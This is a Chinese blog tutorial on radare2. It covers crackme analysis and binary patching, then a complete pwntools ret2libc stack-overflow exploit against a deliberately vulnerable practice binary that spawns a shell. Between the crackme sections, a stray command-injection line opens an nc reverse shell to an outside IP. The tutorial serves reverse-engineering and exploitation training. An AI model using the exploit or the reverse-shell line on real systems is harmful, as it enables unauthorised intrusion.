radare2 入门

最新推荐文章于 2024-09-05 08:07:24 发布
最新推荐文章于 2024-09-05 08:07:24 发布
阅读量4.5k 收藏 40
点赞数 5
分类专栏: linux 文章标签: 逆向 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_31507523/article/details/117200476
版权
本文详细介绍了radare2的安装、使用,包括命令行帮助、程序分析、函数查找、视图模式操作、字符串搜索、破解实践以及进阶的动态调试和漏洞利用。通过实例演示了如何使用radare2进行二进制分析,如查看程序信息、搜索函数、命名变量、打补丁,以及如何动态调试、生成溢出字符串、寻找溢出点。最后,展示了如何利用radare2进行栈溢出漏洞的利用,包括计算库函数地址和构造ROP链。
摘要由CSDN通过智能技术生成

文章目录

正版官方教程:https://www.megabeets.net/a-journey-into-radare-2-part-1/

从入门到放弃:https://xz.aliyun.com/t/7265

逆向笔记:https://evilpan.com/2018/02/09/play-with-radare2/

CTF入门指南工具篇:https://www.bookstack.cn/read/CTF-All-In-One/doc-2.2.1_radare2.md

1、安装radare2

sudo apt install -y gcc make cmake curl git  gcc-multilib
git clone https://github.com/radare/radare2.git
cd radare2
./sys/install.sh

# 卸载
make uninstall
make purge

2、下载破解案列1:

https://github.com/ITAYC0HEN/A-journey-into-Radare2/blob/master/Part%201%20-%20Simple%20crackme/megabeets_0x1

首先编译下面代码
gcc -o main.c xxx

#include <stdio.h>
#include <string.h>

void rot13 (char *s) {
    if (s == NULL)
        return;
    int i;
    for (i = 0; s[i]; i++) {
        if (s[i] >= 'a' && s[i] <= 'm') { s[i] += 13; continue; }
        if (s[i] >= 'A' && s[i] <= 'M') { s[i] += 13; continue; }
        if (s[i] >= 'n' && s[i] <= 'z') { s[i] -= 13; continue; }
        if (s[i] >= 'N' && s[i] <= 'Z') { s[i] -= 13; continue; }
    }
}

int beet(char *name)
{
    char buf[128];
    strcpy(buf, name);
    char string[] = "Megabeets";
    rot13(string);

    return !strcmp(buf, string);
}

int main(int argc, char *argv[])
{
    printf("\n  .:: Megabeets ::.\n");
    printf("Think you can make it?\n");
    if (argc >= 2 && beet(argv[1]))
    {
        printf("Success!\n\n");
    }
    else
        printf("Nop, Wrong argument.\n\n");

    return 0;
}

3、命令行帮助

r2 -h

# rabin2允许从二进制文件中提取信息,包括section, header, Imports, Strings, Entrypoints等。然后,它可以以几种格式导出输出。rabin2能够理解ELF、PE、Mach-O、Java CLASS等多种文件格式
man rabin2

4、新手入门练习1

# -I 查看程序操作系统、语言、字节顺序、架构、缓和(canary、pic、nx)等二进制信息。
rabin2 -I megabeets_0x1

# 运行
r2 megabeets_0x1 

# ie 指令查看入口点
0x08048370]> ie
[Entrypoints]
vaddr=0x08048370 paddr=0x00000370 haddr=0x00000018 hvaddr=0x08048018 type=program
1 entrypoints

# i? 获取i相关的指令信息
[0x08048370]> i?
Usage: i  Get info from opened file (see rabin2's manpage)
Output mode:
| '*'                Output in radare commands
| 'j'                Output in json

# it hash信息
# iz izz 在整个文件中搜索字符串

# a?

# aaa 等效于, 加载程序必须先执行这一步
r2 -A megabeets_0x1

# f?
# fs 列出标记空间,下面是列出和打印
fs imports;f
fs strings;f

# ax?  @@?  axt?

# seek s?

# 显示字符地址
axt @@ str.*

4.1 分析函数列表 符号列表


afl
0x00001060    1 46           entry0
0x00001090    4 41   -> 34   sym.deregister_tm_clones
0x000010c0    4 57   -> 51   sym.register_tm_clones
0x00001100    5 57   -> 54   sym.__do_global_dtors_aux
0x00001040    1 11           sym..plt.got
0x00001140    1 9            entry.init0
0x00001000    3 27           sym._init

# 符号列表
isp

4.2 寻找main函数然后打印出来

s main
pdf

4.3 视图模式

# v 进入视图模式
# p\P 返回 p返回反汇编视图
# q 退出
# ? 帮助
# enter 隐藏或显示其他界面

# :command  与vim类似的指令模式
# ;<comment> 写注释
# VV 进入函数框架模式,类似IDA开始的界面
# R 代码块设置为随机颜色
# g 跳转

# 视图模式下每个函数有数字编号,按该数字进入该函数
# :> ? 0x88 可以列出0x88的数据转换十进制,16禁制,浮点数等信息

4.4 搜索函数

afl
s sym.<fun_mame>
pdf

4.5 破解

# 使用r2自带算法解析rot13
!rahash2 -E rot -S s:13 -s "Megabeets\n"

ood?
ood Zrtnorrgf
dc

5、Crackme 实战练习

下载9个破解案列:https://github.com/mattetti/IOLI-crackme

64 位机器上可能需要安装 gcc-multilib 依赖包才能运行32位程序

crackme0x00

1 使用rabin2查看程序信息
jydr@jie:~/afolder/crackme$ rabin2 -I ./crackme0x00
arch     x86
baddr    0x8048000
binsz    7537
bintype  elf
bits     32
canary   false
class    ELF32
……
2 查看字符串
jydr@jie:~/afolder/crackme$ rabin2 -z crackme0x00
[Strings]
nth paddr      vaddr      len size section type  string
―――――――――――――――――――――――――――――――――――――――――――――――――――――――
0   0x00000568 0x08048568 24  25   .rodata ascii IOLI Crackme Level 0x00\n
1   0x00000581 0x08048581 10  11   .rodata ascii Password: 
2   0x0000058f 0x0804858f 6   7    .rodata ascii 250382
3   0x00000596 0x08048596 18  19   .rodata ascii Invalid Password!\n
4   0x000005a9 0x080485a9 15  16   .rodata ascii Password OK :)\n
3 分析后进入main函数
# 分析全模块方式打开
r2 -A crackme0x00

# 查看函数和打印main
afl
pdf @ main

# 分析汇编后得知密码就是之前看到过的 250382
│           0x0804845e      c74424048f85.  mov dword [s2], str.250382  ; [0x804858f:4]=0x33303532 ; "250382" ; const char *s2
│           0x08048466      890424         mov dword [esp], eax        ; const char *s1
│           0x08048469      e8e2feffff     call sym.imp.strcmp         ; int strcmp(const char *s1, const char *s2)
│           0x0804846e      85c0           test eax, eax
│       ┌─< 0x08048470      740e           je 0x8048480
│       │   0x08048472      c70424968504.  mov dword [esp], str.Invalid_Password__n ; [0x8048596:4]=0x61766e49 ; "Invalid Password!\n" ; const char *format
│       │   0x08048479      e8c2feffff     call sym.imp.printf         ; int printf(const char *format)
│      ┌──< 0x0804847e      eb0c           jmp 0x804848c
│      ││   ; CODE XREF from main @ 0x8048470
│      │└─> 0x08048480      c70424a98504.  mov dword [esp], str.Password_OK_:__n ; [0x80485a9:4]=0x73736150 ; "Password OK :)\n" ; const char *format
│      │    0x08048487      e8b4feffff     call sym.imp.printf         ; int printf(const char *format)
│      │    ; CODE XREF from main @ 0x804847e
│      └──> 0x0804848c      b800000000     mov eax, 0

# 创建保存项目mc0
[0x08048360]> Ps mc0
4 命名变量
# 跳转到main 显示寄存器和变量
[0x08048360]> s main
[0x08048414]> afv
var char * s2 @ esp+0x4
var char * s1 @ ebp-0x18
[0x08048414]> pdf

# 查看一个scanf 的第一个参数
[0x08048414]> ps @ 0x804858c
%s

# 重命名变量
[0x08048414]> afvn passwd s2
[0x08048414]> afvn input s1
[0x08048414]> pdf
            ; DATA XREF from entry0 @ 0x8048377
┌ 127: int main (int argc, char **argv, char **envp);
│           ; var char *input @ ebp-0x18
│           ; var char *passwd @ esp+0x4

# 移除变量名
[0x08048414]> afv-s1

# 按v 进入视图模式 再按c 选中行 ; 写注释
5 打补丁
# 使用 -w 打开或者键入 oo+ 修改程序
r2 -w crackme0x00

# 定位到关键跳转地址
[0x08048414]> s 0x08048470

# 将机器码和需要汇编码互转
jydr@jie:~/afolder/crackme$ rasm2 -a x86 -b 32 -d "0x740e"
je 0x10
jydr@jie:~/afolder/crackme$ rasm2 -a x86 -b 32 "jmp 0x10"
eb0e

# px 查看当前 n 字节的机器码
[0x08048470]> px 20
- offset -   0 1  2 3  4 5  6 7  8 9  A B  C D  E F  0123456789ABCDEF
0x08048470  740e c704 2496 8504 08e8 c2fe ffff eb0c  t...$...........

# wx 写入当前字节
[0x08048470]> wx eb
[0x08048470]> px 20
- offset -   0 1  2 3  4 5  6 7  8 9  A B  C D  E F  0123456789ABCDEF
0x08048470  eb0e c704 2496 8504 08e8 c2fe ffff eb0c  ....$...........

crackme0x01

# 破解与0x00一样,使用rax2转换16进制数据
jydr@jie:~/afolder/crackme$ rax2 0x149a
5274

crackme0x02

# 看汇编可以计算出密码,下面直接打补丁

# 打印某个地址的n行代码
pd 20 @ 0x08048407

# 定位到跳转点
[0x08048451]> s 0x08048451
[0x08048451]> px 20
- offset -   0 1  2 3  4 5  6 7  8 9  A B  C D  E F  0123456789ABCDEF
0x08048451  750e c704 246f 8504 08e8 bdfe ffff eb0c  u...$o..........
0x08048461  c704 247f                                ..$.

# 让程序可写
[0x08048451]> oo+

[0x08048451]> wx 9090

crackme0x03

与 crackme0x02 一样

# 进入某个函数的视图模式
VV @ sym.test

# 反弹shell
8.8.8.8 | echo `mkfifo /tmp/kbrh; nc 192.168.0.6 12345 0</tmp/kbrh | /bin/sh >/tmp/kbrh 2>&1; rm /tmp/kbrh`
先在攻击机开启监听端口 nc -lvvp 12345

6、进阶实战

#include <stdio.h>
#include <string.h>

void rot13 (char *s) {
    if (s == NULL)
        return;
    int i;
    for (i = 0; s[i]; i++) {
        if (s[i] >= 'a' && s[i] <= 'm') { s[i] += 13; continue; }
        if (s[i] >= 'A' && s[i] <= 'M') { s[i] += 13; continue; }
        if (s[i] >= 'n' && s[i] <= 'z') { s[i] -= 13; continue; }
        if (s[i] >= 'N' && s[i] <= 'Z') { s[i] -= 13; continue; }
    }
}

int beet(char *name)
{
    char buf[128];
    strcpy(buf, name);
    char string[] = "Megabeets";
    rot13(string);

    return !strcmp(buf, string);
}

int main(int argc, char *argv[])
{
    char *input; 
    puts("\n  .:: Megabeets ::.\n");
    puts("Show me what you got:");
    
    scanf("%ms", &input);
    if (beet(input))
    {
        printf("Success!\n\n");
    }
    else
        puts("Nop, Wrong argument.\n\n");

    return 0;
}

# 使用如下命令编译源码
gcc -m32  -fno-stack-protector -no-pie megabeets_0x2.c -o megabeets_0x2

1、动态调试

# 以调试模式打开
r2 -d megabeets_0x2

# 分析函数、符号等
aas

# dcu 运行到 main
[0xf7ef90b0]> dcu main
Continue until 0x080493a9 using 1 bpsize
hit breakpoint at: 0x80493a9

# VV 进入视图,g 可以跳转到函数或者地址

# 视图模式下 o 可以切换显示样式

# 这个程序没有堆栈检测,有溢出漏洞

2、ragg2 生成定位溢出点的字符串

使用 radare 框架中名为 ragg2 的工具,它允许生成名为De Bruijn Sequence的循环模式,并检查负载覆盖缓冲区的确切偏移量。

jydr@jie: $ ragg2 -P 100 -r
AAABAACAADAAEAAFAAGAAHAAIAAJAAKAALAAMAANAAOAAPAAQAARAASAATAAUAAVAAWAAXAAYAAZAAaAAbAAcAAdAAeAAfAAgAAh

3、rarun2 找溢出点

rarun2 被用作启动器,用于运行不同环境、参数、权限、目录的程序,并覆盖默认文件描述符(例如stdin)。
当您必须使用长参数运行程序、将大量数据传递给stdin或类似的东西时,这是非常有用的,这通常是利用二进制文件的情况。

  • 使用ragg2将De Bruijn模式写入一个文件
  • 创建rarun2概要文件,并将输出文件设置为stdin
  • 让radare2施展魔法,找到偏移量
jydr@jie:~/afolder$ ragg2 -P 200 -r > fuzz.txt

jydr@jie:~/afolder$ vim run.rr2
jydr@jie:~/afolder$ cat run.rr2 
#!/usr/bin/rarun2
stdin=./fuzz.txt

jydr@jie:~/afolder$ r2 -r run.rr2 -d megabeets_0x2
Process with PID 82019 started...
= attach 82019 82019
bin.baddr 0x08048000
Using 0x8048000
asm.bits 32
glibc.fc_offset = 0x00148
 -- You will soon have an out of memory experience.

# dc 继续执行 在 0x41417641 断下
[0xf7f950b0]> dc

  .:: Megabeets ::.

Show me what you got:
[+] SIGNAL 11 errno=0 addr=0x41417641 code=1 si_pid=1094809153 ret=0
[0x41417641]> 

# wop 显示出具体的崩溃位置
[0x41417641]> wop?
Usage: wop[DO]   len @ addr | value
| wopD len [@ addr]   Write a De Bruijn Pattern of length 'len' at address 'addr'
| wopD* len [@ addr]  Show wx command that creates a debruijn pattern of a specific length
| wopO value          Finds the given value into a De Bruijn Pattern at current offset
[0x41417641]> wopO 0x41417641
140

4、i? 查看库和函数

# 进入调试模式查看引用的库
jydr@jie:~/afolder$ r2 -d megabeets_0x2

# il 查看库
[0xf7f870b0]> il
[Linked libraries]
libc.so.6
1 library


# ii iiq 查看函数
[0xf7f870b0]> ii
[Imports]
nth vaddr      bind   type   lib name
―――――――――――――――――――――――――――――――――――――
1   0x08049090 GLOBAL FUNC       strcmp
2   0x080490a0 GLOBAL FUNC       strcpy
3   0x080490b0 GLOBAL FUNC       puts
4   0x00000000 WEAK   NOTYPE     __gmon_start__
5   0x080490c0 GLOBAL FUNC       __libc_start_main
6   0x080490d0 GLOBAL FUNC       __isoc99_scanf

[0xf7f870b0]> iiq
strcmp
strcpy
puts
__gmon_start__
__libc_start_main
__isoc99_scanf

5、绕过和利用计划

因为有 NX 和 ASlR 安全机制,所以不能直接利用堆栈

  • 暴露 put 的真实地址
  • 计算 libc 的基址
  • 计算系统地址
  • 在 libc 中找到一个包含字符串 /bin/sh 的地址
  • 使用 /bin/sh 调用系统,生成一个shell

±--------------------+
| Stage 1
±--------------------+
| padding (140 bytes)
| puts@plt
| entry_point
| puts@got
±--------------------+

6、开始利用

# 安装 pwntools 框架
pip3 install pwntools

# 回到之前的r2 获取put@plt 地址
[0xf7f3a0b0]> ?v sym.imp.puts
0x80490b0
# 获取put@got 地址
[0xf7f3a0b0]> ?v reloc.puts
0x804c014
# 获取 entry point 地址
[0xf7f3a0b0]> ieq
0x080490e0

编写python 代码

from pwn import *
puts_plt = 0x80490b0
puts_got = 0x804c014
entry_point = 0x080490e0

def main():
    # open process
    p = process("./megabeets_0x2")

    # Initial payload
    payload = 'A'*140
    ropchain = p32(puts_plt)
    ropchain += p32(entry_point)
    ropchain += p32(puts_got)

    payload = str.encode(payload) + ropchain

    p.clean()
    p.sendline(payload)

    leak = p.recv(4)
    leak = u32(leak)
    log.info("puts is at: 0x%x" % leak)
    p.clean()
    
if __name__ == "__main__":
    main()

# 运行之后发现puts 函数的地址每次都是不同的,因为加载基址不同
jydr@jie:~/PycharmProjects/test1$ python3 main.py 
[+] Starting local process './megabeets_0x2': pid 89604
[*] puts is at: 0xf7d8c2b0
[*] Stopped process './megabeets_0x2' (pid 89604)
jydr@jie:~/PycharmProjects/test1$ python3 main.py 
[+] Starting local process './megabeets_0x2': pid 89612
[*] puts is at: 0xf7e0f2b0
[*] Stopped process './megabeets_0x2' (pid 89612)
jydr@jie:~/PycharmProjects/test1$ python3 main.py 
[+] Starting local process './megabeets_0x2': pid 90274
[*] puts is at: 0xf7dae2b0
[*] Stopped process './megabeets_0x2' (pid 90274)

首先,我们需要找到puts与libc的基址的偏移量。让我们再次打开radare2并继续执行,直到到达程序的入口点。我们必须这样做,因为radare2在libc加载之前就开始调试了。当我们到达入口点时,库肯定会被加载。

# 确定函数地址
jydr@jie:~/afolder$ r2 -d megabeets_0x2

[0xf7fa50b0]> dcu entry0
Continue until 0x080490e0 using 1 bpsize
hit breakpoint at: 0x80490e0

[0x080490e0]> dmi libc puts~ puts$
467 0x000712b0 0xf7e082b0 WEAK FUNC 539      puts

[0x080490e0]> dmi libc system~ system$
1560 0x00046040 0xf7ddd040 WEAK FUNC 63       system

[0x080490e0]> dmi libc exit~ exit$
152 0x000387b0 0xf7dcf7b0 GLOBAL FUNC 39       exit



# 在程序中查找“/bin/sh”的引用,为此,使用radare2的搜索功能。默认情况下,雷达在dbg.map是当前的内存映射。我们想要在所有内存映射中搜索,所以需要配置它:
[0x000387b0]> e search.in = dbg.maps

# 获取sh 地址
[0x000387b0]> / /bin/sh
……
0xf7f2d12f hit0_0 .b/strtod_l.c-c/bin/shexit 0canonica.

[0x000387b0]> dmm~libc
0xf7d3b000 0xf7d58000  /usr/lib32/libc-2.32.so

[0x080490e0]> ?X 0xf7ed112f-0xf7d3b000
19612f

最终脚本

# This is a sample Python script.

# Press Shift+F10 to execute it or replace it with your code.
# Press Double Shift to search everywhere for classes, files, tool windows, actions, and settings.


from pwn import *
puts_plt = 0x80490b0
puts_got = 0x804c014
entry_point = 0x080490e0

offset_puts = 0x000712b0
offset_system = 0x00046040
offset_exit = 0x000387b0
offset_bin_sh = 0x19612f


def main():
    # open process
    p = process("./megabeets_0x2")

    # Initial payload
    payload = 'A'*140
    ropchain = p32(puts_plt)
    ropchain += p32(entry_point)
    ropchain += p32(puts_got)

    payload = str.encode(payload) + ropchain

    p.clean()
    p.sendline(payload)

    leak = p.recv(4)
    leak = u32(leak)
    log.info("puts is at: 0x%x" % leak)
    p.clean()

    libc_base = leak - offset_puts
    log.info("libc base: 0x%x" % libc_base)

    # Calculate offsets
    system_addr = libc_base + offset_system
    bin_sh_addr = libc_base + offset_bin_sh
    exit_addr = libc_base + offset_exit

    log.info("system: 0x%x" % system_addr)
    log.info("bin/sh: 0x%x" % bin_sh_addr)
    log.info("exit: 0x%x" % exit_addr)

    # Build 2nd payload
    payload2 = 'A' * 140
    ropchain2 = p32(system_addr)
    ropchain2 += p32(exit_addr)
    ropchain2 += p32(bin_sh_addr)

    payload2 = str.encode(payload2) + ropchain2
    p.sendline(payload2)

    log.success("Here comes the shell!!")

    p.clean()
    p.interactive()

if __name__ == "__main__":
    main()

执行成功后,将生出一个shell 可以执行指令

ydr@jie:~/PycharmProjects/test1$ python3 main.py 
[+] Starting local process './megabeets_0x2': pid 5592
[*] puts is at: 0xf7dcf2b0
[*] libc base: 0xf7d5e000
[*] system: 0xf7da4040
[*] bin/sh: 0xf7ef412f
[*] exit: 0xf7d967b0
[+] Here comes the shell!!
[*] Switching to interactive mode
$ ls
core  main.py  megabeets_0x2  venv
$ whoami
jydr
九阳道人
关注
专栏目录
radare2入门
ChuMeng1999的博客
10-16 4686
目录预备知识关于Radare2熟悉常用命令介绍下r2框架里最强的一个工具:rabin2实验目的实验环境实验步骤一实验步骤二实验步骤三 预备知识 关于Radare2 radare2是一个开源的逆向工程和二进制分析框架,包括反汇编、分析数据、打补丁、比较数据、搜索、替换、虚拟化等等,同时具备超强的脚本加载能力,它可以运行在几乎所有主流的平台(GNU/Linux,Windows *BSD,iOS,OSX,Solaris…)并且支持很多的cpu架构以及文件格式。radare2工程是由一系列的组件构成,这些组件可以在
Radare2 学习笔记:从入门到精通 1. Radare2 简介,及安装
Tangent's blog
04-19 8029
Radare 2 是什么? A free/libre toolchain for easing several low level tasks like forensics, software reverse engineering, exploiting, debugging, … It is composed by a bunch of libraries (which are extend...
Radare2教程
hgrgr65858的博客
12-05 551
Radare2是一个开源的反汇编框架,它可以用于二进制文件分析、调试和逆向工程。它支持多种架构和操作系统,并且具有强大的命令行界面和插件系统。Radare2的学习曲线比较陡峭,但是一旦掌握了基本的概念和命令,就可以快速地进行二进制文件分析和逆向工程。
二进制分析工具-radare2使用教程
纵横四海的博客
11-17 433
【代码】二进制分析工具-radare2使用教程
Radare2 官方教程中文版
最新发布
gitblog_00669的博客
09-05 410
Radare2 官方教程中文版 radare2-bookRadare2 official book项目地址:https://gitcode.com/gh_mirrors/ra/radare2-book 1、项目介绍 Radare2 是一个开源的逆向工程框架,提供了命令行工具、API 和脚本功能,专注于多个逆向工程方面。该项目由社区驱动,旨在提供一个强大的工具集,用于分析、调试和修改二进制文件。 ...
radare2教程
CharlesGodX的博客
12-09 7317
介绍: r2是radare的第二版,目的是提供一组库和工具来处理二进制文件。Radare项目最初是一个取证工具,一个脚本命令行十六进制编辑器,可以打开磁盘文件,但后来添加了对分析二进制文件、分解代码、调试程序、附加到远程gdb服务器的支持,简单的来说它就是一个开源的(但也同样强大的)二进制分析工具,有些时候IDA用不了F5的时候就可以尝试用它来解决一些难题。 下载: https://github...
radare2
zensui2008的专栏
04-21 7839
radare2是个逆向工程工具, 多平台的基于命令行的逆向工具。 主要特点: 多平台多架构的 高度脚本 十六进制编辑器 IO包裹 文件系统支持 调试器支持 进行比较的两个功能或二进制文件之间 操作码,代码分析basicblock 它包含了系列工具,如反汇编工具、调试工具和16进制编辑工具。 支持新的命令(ad, pm, wa*, dm*, dh, pdb, i
老司机带你玩转Radare2
qq_44005305的博客
05-13 2483
说起逆向,你想到的可能是IDA ProOllyDBG等。而Radare2是一款开放源代码的逆向工程平台,它的强大超越你的想象,包括反汇编、分析数据、打补丁、比较数据、搜索、替换、虚拟化等等,同时具备超强的脚本加载能力,并且可以运行在几乎所有主流的平台上。可谓是一大神器。这里我们使用Kali系统来学习它,因为Kali系统自带了这个神器。
radare2进阶
ChuMeng1999的博客
10-16 1316
目录预备知识关于Radare2Visual Modes实验目的实验环境实验步骤一实验任务一实验步骤二实验步骤三 预备知识 关于Radare2 radare2是一个开源的逆向工程和二进制分析框架,包括反汇编、分析数据、打补丁、比较数据、搜索、替换、虚拟化等等,同时具备超强的脚本加载能力,它可以运行在几乎所有主流的平台(GNU/Linux,Windows *BSD,iOS,OSX,Solaris…)并且支持很多的cpu架构以及文件格式。radare2工程是由一系列的组件构成,这些组件可以在radare2界面或者
radare2-workshop-2015
05-11
0.0-Radar2框架的通用性1.1-实用工具套件2.1-Radare2-通用性2.2-Radare2-打印2.3-Radare2-信息命令2.4-Radare2-搜索2.5-分析2.6-可视模式2.7-学生实践-IOLI设置-问题/答案 第一部分:静态分析(1小时30分钟) 第1章...
radare2逆向工程平台使用教程
"radare2book.pdf 是一本详细介绍开源逆向工程工具 radare2 的使用教程。这本书涵盖了从基础到高级的各种主题,帮助用户全面掌握 radare2 的功能和用法。" radare2 是一个强大的逆向工程框架,支持多种架构和平台,...
Radare2 Book
03-23
radare2是一款开放源代码的逆向工程平台,它可以反汇编、调试、分析和操作二进制文件。 radare2的主要特点: •Multi-architecture multi-platform •Highly scriptable •Hexadecimal editor •IO is wrapped •Filesystems support •Debugger support •Diffing between two functions or binaries •Code analysis at opcode, basicblock, function levels
A-journey-into-Radare2:来自https的关于radare2框架的一系列教程
05-27
进入Radare2的旅程 来自一系列有关radare2框架的教程 因为我对Radar2非常热衷,并且我希望越来越多的研究人员熟悉它,使用它并希望为该项目做出贡献,所以我决定创建一系列有关r2的文章和用例。 这些文章旨在教您radare2的基础,其特性和功能。 文章: 第3部分-切割器,脚本和恶意软件分析( , ) 其他(通用): 任何疑问或想法,请随时。
Kali Linux工具radare2(也称为r2)
Jingged的博客
03-14 812
radare2是一款开源的反汇编器框架,用于进行二进制分析、逆向工程和漏洞研究等任务。它具有强大的功能和灵活的架构,适用于各种平台和架构。
radare入门
Yale的博客
01-30 1313
radare2系列共有3个。这是第一个,第二个是进阶用法通过它写exp,第三个实验是通过它分析rom。(国内安全客翻译的文章仅是原博客的第一篇)。参考链接已经在文末给出。 关于Radare2: radare2是一个开源的逆向工程和二进制分析框架,包括反汇编、分析数据、打补丁、比较数据、搜索、替换、虚拟化等等,同时具备超强的脚本加载能力,它可以运行在几乎所有主流的平台(GNU/Linux, .Win...
通过实例学习radare2
Yale的博客
01-30 879
通过调试一个crackme来学习radare 拿到一个crackme,首先查看二进制信息。 我们首先使用-i标识调用rabin2,打印出二进制信息,如操作系统,语言,体系结构 运行起来看看 假设crackme需要参数才能运行 还是运行失败 接下来使用radare2 默认显示了入口点 以i开头的相关命令可以用i?进行查看 I命令的目的是从打开的文件中获取操作信息 接下来我们进行分析。输入...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值